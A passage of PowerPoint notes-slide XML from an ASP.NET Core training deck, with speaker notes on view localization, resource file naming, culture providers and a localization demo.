            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="484188"/>
            <a:ext cx="6096000" cy="3429000"/>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8857236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dirty="0"/>
              <a:t>Scaffolding is not yet available in VS2015. RTM tools will be available only in VS15.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103829334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3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{675416BA-65F7-274A-AD61-D0FA78F3AA6E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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a:xfrm>
            <a:off x="384048" y="3913632"/>
            <a:ext cx="6099048" cy="4773168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Section Overview:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This section discusses the following topics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>View localization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Resource file naming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132079415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89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="484188"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Notes Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Everybody knows that localization is important topic and any framework should be native support for that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>IViewLocalizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service provides localized strings for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ViewLocalizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> class implements this interface and finds the resource location from the view file path.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>View</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Localizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is good for View, however to localize something outside of view- we will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>StringLocalizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0"/>
              <a:t>class instead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89376289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89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="484188"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Notes Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>services.AddLocalization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(options =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>options.ResourcesPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "Resources"); will tell to asp.net core that all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files must be in Resources folder of the project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33530417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dirty="0"/>
              <a:t>Notes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Culture: It is a language and, optionally, a region. https://msdn.microsoft.com/en-us/library/ee825488(v=cs.20).aspx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Neutral culture: A culture that has a specified language, but not a region. (for example “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specific culture: A culture that has a specified language and region. (for example “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-US”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-GB”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-CL”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> a languages that have multiple region cultures- it could be a good strategy- if you will define cultures as on a next example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>-US”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>-GB”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>For major market you will have custom localizations like “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>-US”, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>-GB”. For request from other English speaking regions- will be selected neutral culture “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>”. For non speaking countries will be applied “default culture” that you defined in a configuration</a:t>
            </a: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pPr/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48003142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89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="484188"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Notes Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171442" marR="0" lvl="0" indent="-171442" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="116000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How we can configure SPA apps? It’s our of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Asp.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Core scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resources are named for the type of their class minus the default namespace (which is also the name of the assembly). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, a French resource in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LocalizationWebsite.Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> project for the class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LocalizationWebsite.Web.Startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> would be named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Startup.fr.resx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LocalizationWebsite.Web.Controllers.HomeController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> would be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>Controllers.HomeController.fr.resx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. If for some reason your targeted class is in the same project but not in the base namespace you will need the full type name. For example, in the sample project a type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ExtraNamespace.Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> would be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>ExtraNamespace.Tools.fr.resx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you don’t use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ResourcesPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> option, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>resx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file for a view would be located in the same folder as the view.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147791119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dirty="0"/>
              <a:t>Notes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the best description https://www.jeffogata.com/asp-net-core-localization-culture/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>QueryStringCultureProvider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> expects default query string keys of “culture” to specify culture and “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-culture” to specify the UI culture. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>CookieRequestCultureProvider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uses a default cookie name of .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AspNetCore.Culture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.  and expects a cookie value with this format:  “c={culture-name}|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>={</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-culture-name}”.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The value of the Accept-Language header is a series of one or more language ranges, each of which can have a quality value indicating the client’s preference.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1489DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="643785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pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168815427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b="1" dirty="0"/>
              <a:t>Demo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Demos\Module 04 – Views\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UILocalizationDemo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Startup.cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file and show that we add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>viewlocalization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> services to a service collection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Layout.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and show that we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IViewLocalizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Localizer to localize the view.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344470" lvl="1" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On navigation section show that we replace constant text with request to localizer service </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>navbar-nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
